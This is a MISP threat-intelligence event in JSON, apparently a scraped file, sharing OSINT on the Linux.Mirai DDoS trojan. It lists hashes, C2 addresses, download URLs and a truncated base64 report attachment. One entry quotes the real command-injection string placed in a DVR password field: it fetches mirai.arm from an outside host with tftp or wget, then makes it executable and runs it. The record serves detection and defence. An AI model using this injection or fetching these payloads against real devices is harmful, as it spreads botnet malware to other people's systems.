262 lines
1.3 MiB
JSON
262 lines
1.3 MiB
JSON
|
{
|
||
|
"Event": {
|
||
|
"analysis": "2",
|
||
|
"date": "2016-10-01",
|
||
|
"extends_uuid": "",
|
||
|
"info": "OSINT - Investigation of Linux.Mirai Trojan family",
|
||
|
"publish_timestamp": "1475309596",
|
||
|
"published": true,
|
||
|
"threat_level_id": "3",
|
||
|
"timestamp": "1475309569",
|
||
|
"uuid": "57ef6d48-20c8-4e55-9f02-468f950d210f",
|
||
|
"Orgc": {
|
||
|
"name": "CIRCL",
|
||
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
||
|
},
|
||
|
"Tag": [
|
||
|
{
|
||
|
"colour": "#3b7500",
|
||
|
"name": "circl:incident-classification=\"malware\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#004646",
|
||
|
"name": "type:OSINT"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#32003e",
|
||
|
"name": "ms-caro-malware:malware-type=\"DDoS\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#670080",
|
||
|
"name": "ms-caro-malware:malware-platform=\"Linux\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:tool=\"Mirai\""
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475308942",
|
||
|
"to_ids": false,
|
||
|
"type": "comment",
|
||
|
"uuid": "57ef6d8e-6630-40f3-976b-4234950d210f",
|
||
|
"value": "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u00e2\u20ac\u2122s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "Dr.WEB - Investigation of Linux.Mirai Trojan family",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475308992",
|
||
|
"to_ids": false,
|
||
|
"type": "attachment",
|
||
|
"uuid": "57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"value": "Investigation_of_Linux.Mirai_Trojan_family_en.pdf"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "x86",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309027",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "57ef6de3-827c-4967-9708-42ce950d210f",
|
||
|
"value": "c129e2a23abe826f808725a0724f12470502a3cc"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309027",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "57ef6de3-f1b0-4776-9e5a-4add950d210f",
|
||
|
"value": "8fd0d16edf270c453c5b6b2481d0a044a410c7cd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309027",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "57ef6de3-b284-456d-b74a-4b63950d210f",
|
||
|
"value": "9ff383309ad63da2caa9580d7d85abeece9b13a0"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309209",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "57ef6e99-0a20-4839-a902-4e4d950d210f",
|
||
|
"value": ".shinigami"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309292",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "57ef6eec-c238-49ec-a6f8-4521950d210f",
|
||
|
"value": "http://5.206.225.122/bins/mirai.arm"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309307",
|
||
|
"to_ids": true,
|
||
|
"type": "ip-dst",
|
||
|
"uuid": "57ef6efb-b9fc-498a-a704-4f7f950d210f",
|
||
|
"value": "5.206.225.122"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309335",
|
||
|
"to_ids": true,
|
||
|
"type": "ip-dst",
|
||
|
"uuid": "57ef6f17-16f4-4e11-b0ce-4e91950d210f",
|
||
|
"value": "151.80.99.84"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "The malware was installed on a dvr and was started with this bash injection in password field",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309367",
|
||
|
"to_ids": true,
|
||
|
"type": "comment",
|
||
|
"uuid": "57ef6f37-5074-4e2b-85e6-4599950d210f",
|
||
|
"value": "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309391",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "57ef6f4f-8220-43c7-912c-4818950d210f",
|
||
|
"value": "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309570",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "57ef7002-6900-46c9-ac17-465d02de0b81",
|
||
|
"value": "f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309570",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "57ef7002-0194-4671-b962-44fa02de0b81",
|
||
|
"value": "78440b86e34579001bea6ebc600751f5"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309570",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "57ef7002-0738-471a-8108-4e7502de0b81",
|
||
|
"value": "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309570",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "57ef7002-2174-4783-bf9b-4e0a02de0b81",
|
||
|
"value": "7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309571",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "57ef7003-6fac-4d16-86e4-411502de0b81",
|
||
|
"value": "e64079b3ccf906204474beca1f5cc41d"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309571",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "57ef7003-9390-423a-a424-4b2a02de0b81",
|
||
|
"value": "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309571",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "57ef7003-e8e4-4eee-b196-4b8e02de0b81",
|
||
|
"value": "45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309571",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "57ef7003-2388-4060-a02f-48c602de0b81",
|
||
|
"value": "5d25f735cf059d6b4076947860da5c45"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1475309571",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
|
||
|
"value": "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
}
|